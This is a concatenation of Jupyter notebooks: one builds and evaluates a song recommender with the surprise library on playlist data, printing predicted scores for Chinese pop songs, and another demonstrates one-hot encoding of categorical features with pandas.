{u'was_impossible': False} 陪我看日出\t蔡淳佳\nuser: 4 item: 1003 r_ui = None est = 1.00 {u'was_impossible': False} 幸福了 然后呢\tA-Lin\nuser: 4 item: 1004 r_ui = None est = 1.00 {u'was_impossible': False} 耿耿于怀\t麦浚龙\nuser: 4 item: 1005 r_ui = None est = 1.00 {u'was_impossible': False} 不说出的温柔\t范逸臣\nuser: 4 
item: 1006 r_ui = None est = 1.00 {u'was_impossible': False} 初爱\t杨宗纬\nuser: 4 item: 1007 r_ui = None est = 1.00 {u'was_impossible': False} 只不过是\t花粥\nuser: 4 item: 1008 r_ui = None est = 1.00 {u'was_impossible': False} 理想三旬\t陈鸿宇\nuser: 4 item: 137 r_ui = None est = 1.00 {u'was_impossible': False} 小幸运(Cover 田馥甄)\t金玟岐\nuser: 4 item: 1009 r_ui = None est = 1.00 {u'was_impossible': False} 那又如何\t应嘉俐\nuser: 4 item: 1010 r_ui = None est = 1.00 {u'was_impossible': False} 小相思\t花粥\nuser: 4 item: 1011 r_ui = None est = 1.00 {u'was_impossible': False} 我不难过\t孙燕姿\nuser: 4 item: 1012 r_ui = None est = 1.00 {u'was_impossible': False} 你看不到的天空\t蔡旻佑\nuser: 4 item: 1013 r_ui = None est = 1.00 {u'was_impossible': False} 耿耿于怀\t王笑文\nuser: 4 item: 1014 r_ui = None est = 1.00 {u'was_impossible': False} 试探\t王般若\nuser: 4 item: 1015 r_ui = None est = 1.00 {u'was_impossible': False} 有你陪伴的夏天\t黄婧\nuser: 4 item: 1016 r_ui = None est = 1.00 {u'was_impossible': False} 不说再见\t好妹妹乐队\n"
]
],
[
[
"### 使用矩阵分解做预测",
"_____no_output_____"
]
],
[
[
"### 使用NMF\nfrom surprise import NMF,evaluate \nfrom surprise import Dataset\n\nfile_path = os.path.expanduser(\"./InternalData/3_music_popularplaylist_surpriseformat.txt\")\n\"指定文件格式...\"\nreader = Reader(line_format = \"user item rating timestamp\",sep = ',')\n\n\"载入指定的数据集\"\nloaded_musicdata = Dataset.load_from_file(file_path = file_path, reader = reader)\n\n\"计算歌曲之间的相识度\"\ntrainset = loaded_musicdata.build_full_trainset()\nprint(\"构建数据集合完成。。。\")\n\n\"建模\"\nalgo= NMF()\nalgo.train(trainset)\nprint (\"建模完成。。。\")\n\n\"指定 user inner id = 4\"\nuser_inner_id = 4 \nitem_inner_id_andrating = trainset.ur[user_inner_id] # user_rating 返回的是:(item_inner_id,rating)\nitem_inner_id = map(lambda x:x[0], item_inner_id_andrating)\n\n\"这里不同的是讲inner id全部转成 raw user and itme id 做predict \"\nfor item_iid in item_inner_id:\n print (algo.predict(uid = algo.trainset.to_raw_uid(user_inner_id),iid = algo.trainset.to_raw_iid(item_iid),r_ui = 1, clip = True,verbose=False),\n songid_to_name[algo.trainset.to_raw_iid(item_iid)])",
"构建数据集合完成。。。\n建模完成。。。\nuser: 400232387 item: 27724082 r_ui = 1.00 est = 1.00 {u'was_impossible': False} 听见下雨的声音\t魏如昀\nuser: 400232387 item: 167916 r_ui = 1.00 est = 1.00 {u'was_impossible': False} 梦一场\t萧敬腾\nuser: 400232387 item: 408307325 r_ui = 1.00 est = 1.00 {u'was_impossible': False} 干杯\t西瓜Kune\nuser: 400232387 item: 394618 r_ui = 1.00 est = 1.00 {u'was_impossible': False} 给自己的歌 (Live) - live\t纵贯线\nuser: 400232387 item: 421423806 r_ui = 1.00 est = 1.00 {u'was_impossible': False} 小半\t陈粒\nuser: 400232387 item: 394485 r_ui = 1.00 est = 1.00 {u'was_impossible': False} 思念是一种病(Live) - live\t张震岳\nuser: 400232387 item: 5239563 r_ui = 1.00 est = 1.00 {u'was_impossible': False} 可以不可以\t丁当\nuser: 400232387 item: 30635613 r_ui = 1.00 est = 1.00 {u'was_impossible': False} 秋酿\t房东的猫\nuser: 400232387 item: 185884 r_ui = 1.00 est = 1.00 {u'was_impossible': False} 退后\t周杰伦\nuser: 400232387 item: 276936 r_ui = 1.00 est = 1.00 {u'was_impossible': False} 阴天\t莫文蔚\nuser: 400232387 item: 27867458 r_ui = 1.00 est = 1.00 {u'was_impossible': False} 痛爱\t容祖儿\nuser: 400232387 item: 370776 r_ui = 1.00 est = 1.00 {u'was_impossible': False} 二十世纪少年(Unplugged) - unplug\tPing Pung\nuser: 400232387 item: 213673 r_ui = 1.00 est = 1.00 {u'was_impossible': False} 前所未见\t陈慧琳\nuser: 400232387 item: 355992 r_ui = 1.00 est = 1.00 {u'was_impossible': False} 追梦赤子心\tGALA\nuser: 400232387 item: 326904 r_ui = 1.00 est = 1.00 {u'was_impossible': False} 如果你也听说\t张惠妹\nuser: 400232387 item: 156099 r_ui = 1.00 est = 1.00 {u'was_impossible': False} 寄生\t吴克羣\nuser: 400232387 item: 255219 r_ui = 1.00 est = 1.00 {u'was_impossible': False} 怎么唱情歌\t刘惜君\nuser: 400232387 item: 33314587 r_ui = 1.00 est = 1.00 {u'was_impossible': False} 忽然之间\t巴士那\nuser: 400232387 item: 287744 r_ui = 1.00 est = 1.00 {u'was_impossible': False} 烟霞\t容祖儿\nuser: 400232387 item: 409650841 r_ui = 1.00 est = 1.00 {u'was_impossible': False} 小幸运\t双笙\nuser: 400232387 item: 165005 r_ui = 1.00 est = 1.00 {u'was_impossible': False} 错过\t王铮亮\nuser: 400232387 item: 307594 r_ui = 1.00 est = 1.00 {u'was_impossible': False} 泪海\t许茹芸\nuser: 400232387 item: 276904 r_ui = 1.00 est = 1.00 {u'was_impossible': False} 外面的世界\t莫文蔚\nuser: 400232387 item: 255973 r_ui = 1.00 est = 1.00 {u'was_impossible': False} 短发\t梁咏琪\nuser: 400232387 item: 82561 r_ui = 1.00 est = 1.00 {u'was_impossible': False} 遗憾\t方炯镔\nuser: 400232387 item: 316637 r_ui = 1.00 est = 1.00 {u'was_impossible': False} 假如让我说下去\t杨千嬅\nuser: 400232387 item: 169617 r_ui = 1.00 est = 1.00 {u'was_impossible': False} 爱你\t许志安\nuser: 400232387 item: 400074175 r_ui = 1.00 est = 1.00 {u'was_impossible': False} 你的手信\t陈慧敏\nuser: 400232387 item: 307018 r_ui = 1.00 est = 1.00 {u'was_impossible': False} 遗憾\t许美静\nuser: 400232387 item: 417833356 r_ui = 1.00 est = 1.00 {u'was_impossible': False} 无终\t谢春花\nuser: 400232387 item: 408332757 r_ui = 1.00 est = 1.00 {u'was_impossible': False} 骄傲的少年\t南征北战\nuser: 400232387 item: 26609894 r_ui = 1.00 est = 1.00 {u'was_impossible': False} 一个人一座城\t曹寅\nuser: 400232387 item: 26418879 r_ui = 1.00 est = 1.00 {u'was_impossible': False} 好得很\t麦家瑜\nuser: 400232387 item: 328169 r_ui = 1.00 est = 1.00 {u'was_impossible': False} 终身美丽\t郑秀文\nuser: 400232387 item: 306709 r_ui = 1.00 est = 1.00 {u'was_impossible': False} 倾城\t许美静\nuser: 400232387 item: 32507551 r_ui = 1.00 est = 1.00 {u'was_impossible': False} 想要你知道\t许亚童\nuser: 400232387 item: 28661071 r_ui = 1.00 est = 1.00 {u'was_impossible': False} 忆她\t赵烁\nuser: 400232387 item: 31134197 r_ui = 1.00 est = 1.00 {u'was_impossible': False} 边走边唱\t李荣浩\nuser: 400232387 item: 36199595 r_ui = 
1.00 est = 1.00 {u'was_impossible': False} 再见只是陌生人\t庄心妍\nuser: 400232387 item: 370577 r_ui = 1.00 est = 1.00 {u'was_impossible': False} 每条伤心的大街\t飘乐队\nuser: 400232387 item: 109174 r_ui = 1.00 est = 1.00 {u'was_impossible': False} 死结\t李玖哲\nuser: 400232387 item: 413834900 r_ui = 1.00 est = 1.00 {u'was_impossible': False} 我是你的影子\tXun(易硕成)\nuser: 400232387 item: 67032 r_ui = 1.00 est = 1.00 {u'was_impossible': False} 孤儿仔\t陈奕迅\nuser: 400232387 item: 409650851 r_ui = 1.00 est = 1.00 {u'was_impossible': False} 霜雪千年\t双笙\nuser: 400232387 item: 32334601 r_ui = 1.00 est = 1.00 {u'was_impossible': False} 想起小时候\t前冲\nuser: 400232387 item: 299604 r_ui = 1.00 est = 1.00 {u'was_impossible': False} 给自己的情书\t王菲\nuser: 400232387 item: 176999 r_ui = 1.00 est = 1.00 {u'was_impossible': False} 情非得已\t庾澄庆\nuser: 400232387 item: 188815 r_ui = 1.00 est = 1.00 {u'was_impossible': False} 听说爱情回来过(Live) - live\t张敬轩\nuser: 400232387 item: 256468 r_ui = 1.00 est = 1.00 {u'was_impossible': False} 至少还有你\t林忆莲\nuser: 400232387 item: 35476048 r_ui = 1.00 est = 1.00 {u'was_impossible': False} 致自己\t齐一\nuser: 400232387 item: 405343398 r_ui = 1.00 est = 1.00 {u'was_impossible': False} 可惜我不是他\tXun\nuser: 400232387 item: 28668855 r_ui = 1.00 est = 1.00 {u'was_impossible': False} 恋人心\t魏新雨\nuser: 400232387 item: 417596830 r_ui = 1.00 est = 1.00 {u'was_impossible': False} 美好事物\t房东的猫\nuser: 400232387 item: 31284039 r_ui = 1.00 est = 1.00 {u'was_impossible': False} 你就要走了\t花粥\nuser: 400232387 item: 35528482 r_ui = 1.00 est = 1.00 {u'was_impossible': False} 一半\t薛之谦\nuser: 400232387 item: 30814948 r_ui = 1.00 est = 1.00 {u'was_impossible': False} 斑马斑马 - 翻唱\t房东的猫\nuser: 400232387 item: 413829873 r_ui = 1.00 est = 1.00 {u'was_impossible': False} 还想听你的故事\t谢春花\nuser: 400232387 item: 27867140 r_ui = 1.00 est = 1.00 {u'was_impossible': False} 房间\t刘瑞琦\nuser: 400232387 item: 28936273 r_ui = 1.00 est = 1.00 {u'was_impossible': False} 狮子座(live)\t曾轶可\nuser: 400232387 item: 185811 r_ui = 1.00 est = 1.00 {u'was_impossible': False} 青花瓷\t周杰伦\nuser: 400232387 item: 95610 r_ui = 1.00 est = 1.00 {u'was_impossible': False} 目前\t洪卓立\nuser: 400232387 item: 407927304 r_ui = 1.00 est = 1.00 {u'was_impossible': False} 月球下的人\t李幸倪\nuser: 400232387 item: 5240138 r_ui = 1.00 est = 1.00 {u'was_impossible': False} 明明\t钟一宪\nuser: 400232387 item: 33872719 r_ui = 1.00 est = 1.00 {u'was_impossible': False} 一棵会开花的树(demo)\t谢春花\nuser: 400232387 item: 408814900 r_ui = 1.00 est = 1.00 {u'was_impossible': False} 借我\t谢春花\nuser: 400232387 item: 27808044 r_ui = 1.00 est = 1.00 {u'was_impossible': False} 丑八怪\t薛之谦\nuser: 400232387 item: 288075 r_ui = 1.00 est = 1.00 {u'was_impossible': False} 习惯失恋\t容祖儿\nuser: 400232387 item: 65126 r_ui = 1.00 est = 1.00 {u'was_impossible': False} 红玫瑰\t陈奕迅\nuser: 400232387 item: 30903117 r_ui = 1.00 est = 1.00 {u'was_impossible': False} 漂洋过海来看你\t周深\nuser: 400232387 item: 92939 r_ui = 1.00 est = 1.00 {u'was_impossible': False} 那女孩对我说\t黄义达\nuser: 400232387 item: 406730941 r_ui = 1.00 est = 1.00 {u'was_impossible': False} 后来\t群星\nuser: 400232387 item: 29710981 r_ui = 1.00 est = 1.00 {u'was_impossible': False} 喜剧之王\t李荣浩\nuser: 400232387 item: 22852057 r_ui = 1.00 est = 1.00 {u'was_impossible': False} 爱你\t陈芳语\nuser: 400232387 item: 109628 r_ui = 1.00 est = 1.00 {u'was_impossible': False} 我爱你\t卢广仲\nuser: 400232387 item: 30039685 r_ui = 1.00 est = 1.00 {u'was_impossible': False} 遇见你的时候所有星星都落到我头上\t高姗\nuser: 400232387 item: 28798308 r_ui = 1.00 est = 1.00 {u'was_impossible': False} 一身诗意千寻瀑\t不才\nuser: 400232387 item: 374621 r_ui = 1.00 est = 1.00 
{u'was_impossible': False} 你在烦恼什么\t苏打绿\nuser: 400232387 item: 27955777 r_ui = 1.00 est = 1.00 {u'was_impossible': False} 我为自己代言\t魏晨\nuser: 400232387 item: 25706282 r_ui = 1.00 est = 1.00 {u'was_impossible': False} 夜空中最亮的星\t逃跑计划\nuser: 400232387 item: 28563317 r_ui = 1.00 est = 1.00 {u'was_impossible': False} 阴天快乐\t陈奕迅\nuser: 400232387 item: 329371 r_ui = 1.00 est = 1.00 {u'was_impossible': False} 原谅\t张玉华\nuser: 400232387 item: 36270514 r_ui = 1.00 est = 1.00 {u'was_impossible': False} 放过自己\t庄心妍\nuser: 400232387 item: 238114 r_ui = 1.00 est = 1.00 {u'was_impossible': False} 最好的我\t龚芝怡\nuser: 400232387 item: 276035 r_ui = 1.00 est = 1.00 {u'was_impossible': False} 爱一点\t莫艳琳\nuser: 400232387 item: 210326 r_ui = 1.00 est = 1.00 {u'was_impossible': False} 陪我看日出\t蔡淳佳\nuser: 400232387 item: 25657348 r_ui = 1.00 est = 1.00 {u'was_impossible': False} 幸福了 然后呢\tA-Lin\nuser: 400232387 item: 135355 r_ui = 1.00 est = 1.00 {u'was_impossible': False} 耿耿于怀\t麦浚龙\nuser: 400232387 item: 81836 r_ui = 1.00 est = 1.00 {u'was_impossible': False} 不说出的温柔\t范逸臣\nuser: 400232387 item: 26075548 r_ui = 1.00 est = 1.00 {u'was_impossible': False} 初爱\t杨宗纬\nuser: 400232387 item: 31284032 r_ui = 1.00 est = 1.00 {u'was_impossible': False} 只不过是\t花粥\nuser: 400232387 item: 31445772 r_ui = 1.00 est = 1.00 {u'was_impossible': False} 理想三旬\t陈鸿宇\nuser: 400232387 item: 41665696 r_ui = 1.00 est = 1.00 {u'was_impossible': False} 小幸运(Cover 田馥甄)\t金玟岐\nuser: 400232387 item: 325336 r_ui = 1.00 est = 1.00 {u'was_impossible': False} 那又如何\t应嘉俐\nuser: 400232387 item: 31284031 r_ui = 1.00 est = 1.00 {u'was_impossible': False} 小相思\t花粥\nuser: 400232387 item: 287398 r_ui = 1.00 est = 1.00 {u'was_impossible': False} 我不难过\t孙燕姿\nuser: 400232387 item: 65601 r_ui = 1.00 est = 1.00 {u'was_impossible': False} 你看不到的天空\t蔡旻佑\nuser: 400232387 item: 407679465 r_ui = 1.00 est = 1.00 {u'was_impossible': False} 耿耿于怀\t王笑文\nuser: 400232387 item: 416890227 r_ui = 1.00 est = 1.00 {u'was_impossible': False} 试探\t王般若\nuser: 400232387 item: 28606499 r_ui = 1.00 est = 1.00 {u'was_impossible': False} 有你陪伴的夏天\t黄婧\nuser: 400232387 item: 399354289 r_ui = 1.00 est = 1.00 {u'was_impossible': False} 不说再见\t好妹妹乐队\n"
]
],
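[
[
"# Hedged sketch (not in the original notebook): instead of re-scoring songs the user\n# already has, rank the songs this user has NOT interacted with and keep the top 10.\n# trainset, algo (the NMF model) and songid_to_name all come from the cells above.\nuser_inner_id = 4\nraw_uid = algo.trainset.to_raw_uid(user_inner_id)\nrated_items = set(pair[0] for pair in trainset.ur[user_inner_id])\n\ncandidates = []\nfor item_inner_id in trainset.all_items():\n    if item_inner_id in rated_items:\n        continue\n    raw_iid = algo.trainset.to_raw_iid(item_inner_id)\n    candidates.append((algo.predict(raw_uid, raw_iid).est, raw_iid))\n\nfor est, raw_iid in sorted(candidates, reverse = True)[:10]:\n    print(str(est) + '\\t' + songid_to_name[raw_iid])",
"_____no_output_____"
]
],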
[
[
"### 可以使用以下方法来存储和重新加载模型",
"_____no_output_____"
]
],
[
[
"import surprise\nsurprise.dump.dump(\"./InternalData/Recommendation.model\",algo = algo) # save to local\n\n\"Reload Model Again\"\nreload_algo = surprise.dump.load(\"./InternalData/Recommendation.model\")",
"_____no_output_____"
]
],
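[
[
"# Small follow-up sketch (added for illustration): the reloaded algorithm behaves like the\n# original one, e.g. it can score one (playlist, song) pair taken from the raw ratings.\nraw_uid, raw_iid, true_r, _ = loaded_musicdata.raw_ratings[0]\nprint(reload_algo.predict(raw_uid, raw_iid, r_ui = true_r))",
"_____no_output_____"
]
],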
[
[
"### 不同推荐系统算法之间的差距评估",
"_____no_output_____"
]
],
[
[
"\"首先载入数据Dataset\"\nfrom surprise import NMF,evaluate,NormalPredictor,BaselineOnly,KNNBasic,KNNWithMeans,KNNBaseline,SVD \nfrom surprise import Dataset,Reader,SVDpp,SlopeOne,CoClustering\nimport os,io\nfile_path = os.path.expanduser(\"./InternalData/3_music_popularplaylist_surpriseformat.txt\")\n\"指定文件格式...\"\nreader = Reader(line_format = \"user item rating timestamp\",sep = ',')\n\n\"载入指定的数据集\"\nloaded_musicdata = Dataset.load_from_file(file_path = file_path, reader = reader)\nloaded_musicdata.split(n_folds = 5)\n\n\"Return a list of ratings (user, item, rating, timestamp) read from\\ file_name\"\n#loaded_musicdata.read_ratings(file_path)\n",
"_____no_output_____"
],
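[
"# Hedged sketch: evaluate() and split() used in this section are deprecated in newer\n# surprise releases; assuming surprise >= 1.05, the same comparison can be run with\n# cross_validate from surprise.model_selection, e.g. for NMF:\nfrom surprise.model_selection import cross_validate\ncross_validate(NMF(), loaded_musicdata, measures = ['rmse', 'mae'], cv = 5, verbose = True)",
"_____no_output_____"
],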
[
"\"Evaluate the performance of the algorithm on given data\"\nalgo = NMF()\nperf = evaluate(algo, data = loaded_musicdata, measures=[u'rmse',u'mae'], with_dump=False, dump_dir=None, verbose=1)\nprint perf",
"Evaluating RMSE, MAE of algorithm NMF.\n\n------------\nFold 1\nRMSE: 0.0000\nMAE: 0.0000\n------------\nFold 2\nRMSE: 0.0000\nMAE: 0.0000\n------------\nFold 3\nRMSE: 0.0000\nMAE: 0.0000\n------------\nFold 4\nRMSE: 0.0000\nMAE: 0.0000\n------------\nFold 5\nRMSE: 0.0000\nMAE: 0.0000\n------------\n------------\nMean RMSE: 0.0000\nMean MAE : 0.0000\n------------\n------------\ndefaultdict(<type 'list'>, {u'mae': [0.0, 0.0, 0.0, 0.0, 0.0], u'rmse': [0.0, 0.0, 0.0, 0.0, 0.0]})\n"
],
[
"\"Evaluate the performance of the algorithm on given data\"\nalgo = NormalPredictor()\nperf = evaluate(algo, data = loaded_musicdata, measures=[u'rmse',u'mae'], with_dump=False, dump_dir=None, verbose=1)\nprint perf",
"Evaluating RMSE, MAE of algorithm NormalPredictor.\n\n------------\nFold 1\nRMSE: 0.0000\nMAE: 0.0000\n------------\nFold 2\nRMSE: 0.0000\nMAE: 0.0000\n------------\nFold 3\nRMSE: 0.0000\nMAE: 0.0000\n------------\nFold 4\nRMSE: 0.0000\nMAE: 0.0000\n------------\nFold 5\nRMSE: 0.0000\nMAE: 0.0000\n------------\n------------\nMean RMSE: 0.0000\nMean MAE : 0.0000\n------------\n------------\ndefaultdict(<type 'list'>, {u'mae': [0.0, 0.0, 0.0, 0.0, 0.0], u'rmse': [0.0, 0.0, 0.0, 0.0, 0.0]})\n"
],
[
"\"Evaluate the performance of the algorithm on given data\"\nalgo = BaselineOnly()\nperf = evaluate(algo, data = loaded_musicdata, measures=[u'rmse',u'mae'], with_dump=False, dump_dir=None, verbose=1)\nprint perf",
"Evaluating RMSE, MAE of algorithm BaselineOnly.\n\n------------\nFold 1\nEstimating biases using als...\nRMSE: 0.0000\nMAE: 0.0000\n------------\nFold 2\nEstimating biases using als...\nRMSE: 0.0000\nMAE: 0.0000\n------------\nFold 3\nEstimating biases using als...\nRMSE: 0.0000\nMAE: 0.0000\n------------\nFold 4\nEstimating biases using als...\nRMSE: 0.0000\nMAE: 0.0000\n------------\nFold 5\nEstimating biases using als...\nRMSE: 0.0000\nMAE: 0.0000\n------------\n------------\nMean RMSE: 0.0000\nMean MAE : 0.0000\n------------\n------------\ndefaultdict(<type 'list'>, {u'mae': [0.0, 0.0, 0.0, 0.0, 0.0], u'rmse': [0.0, 0.0, 0.0, 0.0, 0.0]})\n"
],
[
"\"Evaluate the performance of the algorithm on given data\"\nalgo = KNNBasic()\nperf = evaluate(algo, data = loaded_musicdata, measures=[u'rmse',u'mae'], with_dump=False, dump_dir=None, verbose=1)\nprint perf",
"Evaluating RMSE, MAE of algorithm KNNBasic.\n\n------------\nFold 1\nComputing the msd similarity matrix...\nDone computing similarity matrix.\nRMSE: 0.0000\nMAE: 0.0000\n------------\nFold 2\nComputing the msd similarity matrix...\nDone computing similarity matrix.\nRMSE: 0.0000\nMAE: 0.0000\n------------\nFold 3\nComputing the msd similarity matrix...\nDone computing similarity matrix.\nRMSE: 0.0000\nMAE: 0.0000\n------------\nFold 4\nComputing the msd similarity matrix...\nDone computing similarity matrix.\nRMSE: 0.0000\nMAE: 0.0000\n------------\nFold 5\nComputing the msd similarity matrix...\nDone computing similarity matrix.\nRMSE: 0.0000\nMAE: 0.0000\n------------\n------------\nMean RMSE: 0.0000\nMean MAE : 0.0000\n------------\n------------\ndefaultdict(<type 'list'>, {u'mae': [0.0, 0.0, 0.0, 0.0, 0.0], u'rmse': [0.0, 0.0, 0.0, 0.0, 0.0]})\n"
],
[
"\"Evaluate the performance of the algorithm on given data\"\nalgo = KNNWithMeans()\nperf = evaluate(algo, data = loaded_musicdata, measures=[u'rmse',u'mae'], with_dump=False, dump_dir=None, verbose=1)\nprint perf",
"Evaluating RMSE, MAE of algorithm KNNWithMeans.\n\n------------\nFold 1\nComputing the msd similarity matrix...\nDone computing similarity matrix.\nRMSE: 0.0000\nMAE: 0.0000\n------------\nFold 2\nComputing the msd similarity matrix...\nDone computing similarity matrix.\nRMSE: 0.0000\nMAE: 0.0000\n------------\nFold 3\nComputing the msd similarity matrix...\nDone computing similarity matrix.\nRMSE: 0.0000\nMAE: 0.0000\n------------\nFold 4\nComputing the msd similarity matrix...\nDone computing similarity matrix.\nRMSE: 0.0000\nMAE: 0.0000\n------------\nFold 5\nComputing the msd similarity matrix...\nDone computing similarity matrix.\nRMSE: 0.0000\nMAE: 0.0000\n------------\n------------\nMean RMSE: 0.0000\nMean MAE : 0.0000\n------------\n------------\ndefaultdict(<type 'list'>, {u'mae': [0.0, 0.0, 0.0, 0.0, 0.0], u'rmse': [0.0, 0.0, 0.0, 0.0, 0.0]})\n"
],
[
"\"Evaluate the performance of the algorithm on given data\"\nalgo = SVD()\nperf = evaluate(algo, data = loaded_musicdata, measures=[u'rmse',u'mae'], with_dump=False, dump_dir=None, verbose=1)\nprint perf",
"Evaluating RMSE, MAE of algorithm SVD.\n\n------------\nFold 1\nRMSE: 0.0365\nMAE: 0.0166\n------------\nFold 2\nRMSE: 0.0365\nMAE: 0.0166\n------------\nFold 3\nRMSE: 0.0365\nMAE: 0.0166\n------------\nFold 4\nRMSE: 0.0366\nMAE: 0.0167\n------------\nFold 5\nRMSE: 0.0367\nMAE: 0.0168\n------------\n------------\nMean RMSE: 0.0366\nMean MAE : 0.0167\n------------\n------------\ndefaultdict(<type 'list'>, {u'mae': [0.01662157364728032, 0.016584225356639986, 0.016605750311511524, 0.016728002266939445, 0.016829999107087646], u'rmse': [0.03646898490849693, 0.0365140019773, 0.036506678247635156, 0.03664450724028625, 0.0367032737619232]})\n"
],
[
"\"Evaluate the performance of the algorithm on given data\"\nalgo = SVDpp() # SVD++\nperf = evaluate(algo, data = loaded_musicdata, measures=[u'rmse','mae'], with_dump=False, dump_dir=None, verbose=1)\nprint perf",
"Evaluating RMSE, MAE of algorithm SVDpp.\n\n------------\nFold 1\nRMSE: 0.0147\nMAE: 0.0063\n------------\nFold 2\nRMSE: 0.0147\nMAE: 0.0063\n------------\nFold 3\nRMSE: 0.0149\nMAE: 0.0065\n------------\nFold 4\nRMSE: 0.0151\nMAE: 0.0065\n------------\nFold 5\nRMSE: 0.0153\nMAE: 0.0066\n------------\n------------\nMean RMSE: 0.0149\nMean MAE : 0.0064\n------------\n------------\ndefaultdict(<type 'list'>, {'mae': [0.006321437663896232, 0.006263019339022795, 0.006458306290878363, 0.0065106171361254085, 0.006585042253559304], u'rmse': [0.014696295027144698, 0.014728653951463349, 0.014901658710573053, 0.015100227273104618, 0.015313478223964816]})\n"
],
[
"\"Evaluate the performance of the algorithm on given data\"\nalgo = CoClustering()\nperf = evaluate(algo, data = loaded_musicdata, measures=[u'rmse'], with_dump=False, dump_dir=None, verbose=1)\nprint (perf)\n",
"Evaluating RMSE of algorithm CoClustering.\n\n------------\nFold 1\nRMSE: 0.0000\n------------\nFold 2\nRMSE: 0.0000\n------------\nFold 3\nRMSE: 0.0000\n------------\nFold 4\nRMSE: 0.0000\n------------\nFold 5\nRMSE: 0.0000\n------------\n------------\nMean RMSE: 0.0000\n------------\n------------\ndefaultdict(<type 'list'>, {u'rmse': [0.0, 0.0, 0.0, 0.0, 0.0]})\n"
],
[
"#help(data)\n#help(algo)\n#help(KNNBaseline)\n#help(KNNWithMeans)\n#help(Reader)\n#help(Dataset)\n#help(music_full_trainset)",
"_____no_output_____"
],
[
"#rid_to_name,name_to_rid = read_item_names()\n#rid_to_name['344']",
"_____no_output_____"
],
[
"#name_to_rid.values()\n#name_to_rid.keys()\n#name_to_rid[\"To Cross the Rubicon (1991)\"]",
"_____no_output_____"
]
]
] | [
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code"
] | [
[
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown",
"markdown"
],
[
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown",
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code"
]
] |
cb2c0fe1b45259144c8d2bd222d1ab61ffa19182 | 44,348 | ipynb | Jupyter Notebook | notebooks/setup/simple-tests.ipynb | Alone2671/oss2021 | 293f2c37af0cda04cdfaaf43dccdf23c97de12d9 | [
"CC0-1.0"
] | 28 | 2020-12-07T12:50:08.000Z | 2022-02-12T18:10:49.000Z | notebooks/setup/simple-tests.ipynb | Alone2671/oss2021 | 293f2c37af0cda04cdfaaf43dccdf23c97de12d9 | [
"CC0-1.0"
] | 38 | 2020-02-23T18:09:46.000Z | 2020-07-20T17:24:10.000Z | notebooks/setup/simple-tests.ipynb | Alone2671/oss2021 | 293f2c37af0cda04cdfaaf43dccdf23c97de12d9 | [
"CC0-1.0"
] | 38 | 2020-10-05T19:25:34.000Z | 2022-02-18T22:39:32.000Z | 273.753086 | 40,140 | 0.923694 | [
[
[
"## Simple tests\n\nuse this to experiment with jupyter",
"_____no_output_____"
]
],
[
[
"df = pd.DataFrame(hugo.participants_metadatas())",
"_____no_output_____"
],
[
"df.columns",
"_____no_output_____"
],
[
"%matplotlib inline\ndf_plot = df.groupby(['company','status']).size().round().unstack().fillna(0)\ndf_plot.plot(kind='barh',figsize=(10,10),stacked=True, table=False)",
"_____no_output_____"
],
[
"sys.path",
"_____no_output_____"
]
]
] | [
"markdown",
"code"
] | [
[
"markdown"
],
[
"code",
"code",
"code",
"code"
]
] |
cb2c284d7ad5676757b23f0f9179bd7716f25cbe | 40,791 | ipynb | Jupyter Notebook | Feature_Engineering_Day_Excercises/Day_3_Feature Engineering- Handling Categorical Feature.ipynb | Saravanan-Ganesh/Feature-Engineering | 73b4f41454acfa5db7e16963b3b1efe0bae459ae | [
"MIT"
] | null | null | null | Feature_Engineering_Day_Excercises/Day_3_Feature Engineering- Handling Categorical Feature.ipynb | Saravanan-Ganesh/Feature-Engineering | 73b4f41454acfa5db7e16963b3b1efe0bae459ae | [
"MIT"
] | null | null | null | Feature_Engineering_Day_Excercises/Day_3_Feature Engineering- Handling Categorical Feature.ipynb | Saravanan-Ganesh/Feature-Engineering | 73b4f41454acfa5db7e16963b3b1efe0bae459ae | [
"MIT"
] | null | null | null | 26.765748 | 95 | 0.255449 | [
[
[
"##### Handle Categorical Features\n###### One Hot Encoding",
"_____no_output_____"
]
],
[
[
"import pandas as pd",
"_____no_output_____"
],
[
"df=pd.read_csv('titanic.csv',usecols=['Sex'])",
"_____no_output_____"
],
[
"df.head()",
"_____no_output_____"
],
[
"pd.get_dummies(df,drop_first=True).head()",
"_____no_output_____"
],
[
"df=pd.read_csv('titanic.csv',usecols=['Embarked'])",
"_____no_output_____"
],
[
"df['Embarked'].unique()",
"_____no_output_____"
],
[
"df.dropna(inplace=True)",
"_____no_output_____"
],
[
"pd.get_dummies(df,drop_first=True).head()",
"_____no_output_____"
],
[
"#### Onehotencoding with many categories in a feature",
"_____no_output_____"
],
[
"df=pd.read_csv('mercedes.csv',usecols=[\"X0\",\"X1\",\"X2\",\"X3\",\"X4\",\"X5\",\"X6\"])",
"_____no_output_____"
],
[
"df.head()",
"_____no_output_____"
],
[
"for i in df.columns:\n print(len(df[i].unique()))",
"47\n27\n44\n7\n4\n29\n12\n"
],
[
"df.X1.value_counts().sort_values(ascending=False).head(10)",
"_____no_output_____"
],
[
"lst_10=df.X1.value_counts().sort_values(ascending=False).head(10).index\nlst_10=list(lst_10)",
"_____no_output_____"
],
[
"lst_10",
"_____no_output_____"
],
[
"import numpy as np\nfor categories in lst_10:\n df[categories]=np.where(df['X1']==categories,1,0)",
"_____no_output_____"
],
[
"lst_10.append('X1')",
"_____no_output_____"
],
[
"df[lst_10]",
"_____no_output_____"
]
]
] | [
"markdown",
"code"
] | [
[
"markdown"
],
[
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
